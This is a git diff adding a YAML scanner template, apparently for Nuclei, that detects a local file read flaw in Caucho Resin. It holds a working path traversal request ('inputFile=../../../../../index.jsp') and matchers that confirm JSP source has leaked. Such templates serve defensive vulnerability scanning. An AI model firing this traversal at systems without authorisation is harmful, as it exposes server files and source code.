diff --git a/vulnerabilities/other/resin-inputfile-fileread.yaml b/vulnerabilities/other/resin-inputfile-fileread.yaml new file mode 100644 index 0000000000..ee8dc63107 --- /dev/null +++ b/vulnerabilities/other/resin-inputfile-fileread.yaml @@ -0,0 +1,20 @@ +id: resin-inputfile-fileread +info: + name: Caucho Resin LFR + author: princechaddha + severity: high + tags: resin,caucho,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %" + part: body